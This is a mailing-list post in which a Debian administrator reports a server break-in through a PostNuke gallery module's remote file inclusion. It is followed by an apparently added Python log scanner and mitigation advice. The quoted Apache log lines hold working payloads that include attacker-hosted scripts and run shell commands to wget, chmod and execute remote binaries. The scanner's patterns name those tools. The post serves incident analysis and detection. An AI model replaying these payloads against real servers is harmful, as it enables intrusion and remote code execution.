Hello debian-security, One of my servers has been cracked into and I am looking for the weak spots of the system and also looking for ways to lock the secholes I might (also) have. The linux box is an up-to-date woody (incl. security updates).
My first question is how come such a thing worked on my box? (I do not know php myself at all):

"GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd; HTTP/1.1" 200 7047

[*] see bottom of this email for further occurrences

The URL is part of a postnuke site and they could start up the telnetd binary by invoking a URL similar to the above URL! Is this a known sechole?

I am providing some further details about these cracks for others to be aware of similar threats...:

PostNuke: The Phoenix Release (0.7.2.6)
(Debian unstable has version 0.732-4.2, so the first thing to do is to backport the unstable version. Or is it rather a php bug?:

ii libphp-adodb 1.51-1.1 The 'adodb' database abstraction layer for p
ii libphp-phplot 4.4.6-2 The graphic library for php.
ii php3-cgi 3.0.18-23.1woo A server-side, HTML-embedded scripting langu
ii php3-cgi-mysql 3.0.18-23.1woo Mysql module for PHP3 (cgi)
ii php3-doc 3.0.18-23.1woo Documentation for PHP3
ii php4 4.1.2-6woody3 A server-side, HTML-embedded scripting langu
ii php4-cgi 4.1.2-6woody3 A server-side, HTML-embedded scripting langu
ii php4-gd 4.1.2-6woody3 GD module for php4
ii php4-imap 4.1.2-6woody3 IMAP module for php4
ii php4-ldap 4.1.2-6woody3 LDAP module for php4
ii php4-mysql 4.1.2-6woody3 MySQL module for php4
ii php4-pear 4.2.1-3 PEAR - PHP Extension and Application Reposit
ii php4-pear-log 1.1-1 Log module for PEAR
ii php4-pgsql 4.1.2-4 PostgreSQL module for php4
ii phplib 7.2d-3.1 Library for easy writing web applications (s
ii phpmyadmin 2.5.2-1woody2 A set of PHP-scripts to administrate MySQL o
ii phpnuke 6.0-10 A web portal and community system, mostly li
ii phppgadmin 2.4.1-2 A set of PHP-scripts to administrate Postgre
ii phpsysinfo 2.0-3woody1 PHP Based Host Information
)

$modversion['name'] = 'My_eGallery'; // Module Name
$modversion['version'] = '3.1.1'; // Version Number

The telnetd and other ELF executables they used and that were found in /tmp are the following:

-rwxr-xr-x 1 www-data www-data 2897 ptrace
-rwxrwxrwx 1 www-data www-data 19242 r0nin.txt
-rw-r--r-- 1 www-data www-data 19242 r0nin.txt.1
-rw-r--r-- 1 www-data www-data 19242 r0nin.txt.2
-rw-r--r-- 1 www-data www-data 1325904 r.txt
-rwxr-xr-x 1 www-data www-data 17643 suco.txt
-rwxrwxrwx 1 www-data www-data 170613 telnetd
-rw-r--r-- 1 www-data www-data 170613 telnetd.1
-rw-r--r-- 1 www-data www-data 170613 telnetd.2
-rw-r--r-- 1 www-data www-data 170613 telnetd.3
-rwxr-xr-x 1 www-data www-data 17836 x
-rwxr-xr-x 1 www-data www-data 5013 x0x
-rwsrwsrwt 1 www-data www-data 7180 xiit
-rw-r--r-- 1 www-data www-data 7180 xiit.1
-rw-r--r-- 1 www-data www-data 7180 xiit.2

The following was found in the directory of displayCategory.php:

-rwxr-xr-x 1 www-data www-data 6453 bd.cgi

Some other interesting details:

www-data 11584 0.0 0.1 2536 1288 ? S 18:57 0:00 wget http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt

a wget-log file was open in /tmp, containing:

--18:57:51-- http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt
=> `r.txt'
Resolving www.cyberlordsteam.hpg.ig.com.br... done.
Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,590,900 [text/plain]
3% [> ] 174,224 796.04B/s ETA 1:32:28

And I also still got those binaries they used. Is anyone interested in taking a look at them?

Thank you.

Regs,
Csan

PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to, if possible.

PS 2: further apache log crack entries:

200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 7047
200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd; HTTP/1.1" 200 7047
200.234.12.110 - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 3856
adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET /index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a HTTP/1.0" 200 21034
200-171-247-29.customer.telesp.net.br - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://iradex.8bit.co.uk/&cmd=uname%20-a;id HTTP/1.1" 200 30021
201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097
201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.anjosdoasfalto.com/r0nin.txt;chmod%20777%20r0nin.txt;./r0nin.txt HTTP/1.1" 200 1625
200-158-210-235.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.cimentsorigny.com/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2250
201-0-210-29.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097
frb9-d9bb4672.pool.mediaways.net - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://ago.edns.ig3.net&cmd=uname%20-a HTTP/1.1" 200 1215
200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097
200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://inf3ction.port5.com/xiit;chmod%207777%20xiit;./xiit HTTP/1.1" 200 1610

Csan alias János Holányi
Debian Group leader - Association of Hungarian Linux Users
gpg --keyserver hkp://pgp.mit.edu --recv-keys 82CBB661
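The log entries in this post all share one shape: a script parameter (basepath) whose value is a remote URL, which the PHP script then includes, followed by a second parameter (cmd) carrying a shell command line. The following is an added example, not code from the original post or from PostNuke, that scans Apache access-log lines for exactly that pattern so an administrator can find similar requests in their own logs. The sample lines are three entries quoted from the post plus one constructed benign request; the detection rules (a parameter value that is itself a URL, or one containing shell separators or recon/download commands) are the author of this example's own heuristics and are assumptions, not part of the original.

```python
import re
from urllib.parse import unquote_plus

# Apache common-log shape as it appears in the post: host, two '-' fields,
# an optional [timestamp], then "METHOD path PROTO", status and size.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ (?:\[[^\]]*\] )?'
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Heuristic indicators (assumed for this example):
# - a query value that is a URL is the remote-file-inclusion shape seen above;
# - shell separators or the recon/download commands from the post's log lines
#   are the command-execution stage that follows the inclusion.
REMOTE_URL_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)
SHELL_CMD_RE = re.compile(
    r'(?:^|[;&|`\s])(?:id|uname|pwd|wget|curl|chmod|cd)(?=[\s;&|]|$)'
)
SHELL_META = set(';|`')

# Constructed sample input: lines 0-2 are quoted from the post, line 3 is a
# constructed benign request to show the scanner ignoring normal traffic.
SAMPLE_LINES = [
    '200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php'
    '?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 7047',
    '201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php'
    '?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.anjosdoasfalto.com/r0nin.txt;'
    'chmod%20777%20r0nin.txt;./r0nin.txt HTTP/1.1" 200 1625',
    'frb9-d9bb4672.pool.mediaways.net - - "GET /modules/My_eGallery/public/displayCategory.php'
    '?basepath=http://ago.edns.ig3.net&cmd=uname%20-a HTTP/1.1" 200 1215',
    '10.0.0.5 - - [10/Oct/2003:18:57:51 +0200] "GET /index.php?page=about HTTP/1.1" 200 1234',
]


def parse_query(query):
    """Split a raw query string on '&' only and percent-decode both sides.

    Done by hand because ';' is part of the injected payloads here, and some
    parsers (including older urllib.parse.parse_qs) also treat ';' as a
    separator, which would hide the command line inside the cmd value."""
    params = []
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def analyze_line(line):
    """Return a finding dict for one access-log line, or None if it is clean
    or does not parse as an access-log entry."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Only the first '?' separates path from query; later ones belong to values.
    script, _, query = m.group('path').partition('?')
    reasons = []
    for key, value in parse_query(query):
        if REMOTE_URL_RE.match(value):
            reasons.append(f'remote URL in parameter {key!r}')
        if SHELL_CMD_RE.search(value) or (SHELL_META & set(value)):
            reasons.append(f'shell command or metacharacter in parameter {key!r}')
    if not reasons:
        return None
    return {
        'host': m.group('host'),
        'script': script,
        'status': int(m.group('status')),
        'reasons': reasons,
    }


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep the findings."""
    return [f for f in (analyze_line(l) for l in lines) if f]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LINES):
        print(finding['host'], finding['script'], finding['status'])
        for reason in finding['reasons']:
            print('   ', reason)
```

Feed a real log with `scan(open('/var/log/apache/access.log'))`. A 200 status on a flagged request, as in every entry above, means the script answered the request rather than rejecting it, so those lines deserve the closest look. On the application side the fix is to never build an include path from request input; at the PHP level, `allow_url_fopen = Off` in php.ini stops PHP from fetching and including remote URLs at all, which removes the first stage of this attack even when a script is flawed.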